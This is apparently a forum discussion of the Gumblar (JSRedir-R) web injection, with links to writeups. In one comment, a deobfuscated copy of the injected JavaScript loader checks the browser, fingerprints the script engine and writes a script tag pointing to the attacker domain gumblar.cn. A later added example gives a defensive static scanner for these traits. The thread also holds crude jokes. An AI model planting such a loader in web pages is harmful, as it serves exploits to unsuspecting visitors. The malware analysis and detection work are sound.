Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
It seems to be cropping up all over the place with no obvious infection vector.
A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …
I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.
function(){
    var versionString = "";
    if( (navigator.userAgent.indexOf("Win")>0)
        && (navigator.userAgent.indexOf("NT 6")<0)
        && (document.cookie.indexOf("miek=1")<0)
        && (typeof(zrvzts)!=typeof("A")) ) {
        zrvzts="A";
        if(window.ScriptEngine) {
            versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
        }
        document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );
    }
}
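Added example, not part of the comment above and not taken from the malware: a static check a site owner could run over page source for the traits that comment describes (character escaping, the pre-Vista user-agent gate, the run-once typeof guard, the script-engine fingerprint, and document.write of a remote script). The indicator names, the two-hit threshold and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: static triage of page source for the traits described in the comment above.
// Indicator names, the two-hit threshold and the sample pages are constructed for illustration.
const INDICATORS = [
  { name: "script-engine-fingerprint", re: /ScriptEngine(?:Major|Minor|Build)Version\s*\(/ },
  { name: "pre-vista-ua-gate", re: /indexOf\(\s*["']NT 6["']\s*\)\s*<\s*0/ },
  { name: "run-once-typeof-guard", re: /typeof\(\s*\w+\s*\)\s*!=\s*typeof\(/ },
  { name: "document-write-remote-script",
    re: /document\.write\([^)]*<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?\/\/([^"'\s>+\/]+)/i },
];

// Undo %XX, \xXX and \uXXXX escaping so the patterns see the text the browser would run.
function decodeEscapes(src) {
  return src.replace(/(?:%|\\x)([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, two, four) => String.fromCharCode(parseInt(two || four, 16)));
}

// Returns the indicators that matched and any remote script host that was found.
function scanPage(source) {
  const text = decodeEscapes(source);
  const hits = [];
  const remoteHosts = [];
  for (const { name, re } of INDICATORS) {
    const m = re.exec(text);
    if (!m) continue;
    hits.push(name);
    if (m[1]) remoteHosts.push(m[1].toLowerCase());
  }
  // One indicator alone is common in legitimate code; require two before flagging.
  return { hits, remoteHosts, suspicious: hits.length >= 2 };
}

// Constructed sample: an escaped inline script with a placeholder host.
const SAMPLE_PAGE = [
  "<html><body><p>Welcome</p><script>var s='",
  "if(navigator.userAgent.indexOf(%22NT 6%22)<0 && typeof(q)!=typeof(%22A%22)){",
  "%64ocument.write(%22<scr%69pt src=//example.invalid/rss/?id=%22",
  "+ScriptEngineMajorVersion()+%22></scr%69pt>%22);}",
  "';</script></body></html>",
].join("");

// Constructed sample: an ordinary page that uses document.write harmlessly.
const CLEAN_PAGE = "<html><body><script>document.write('hello');</script></body></html>";

console.log(scanPage(SAMPLE_PAGE));
console.log(scanPage(CLEAN_PAGE));
```

Matching the raw source without the decoding pass misses the document.write indicator, which is why the escapes are undone first.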
"The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."
NO JUST NO
It took me a month to get that image out of my head and here you go putting it back there.
I guess I'm just going to do like Sam Neill in Event Horizon
http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg
/Good bye to my eyes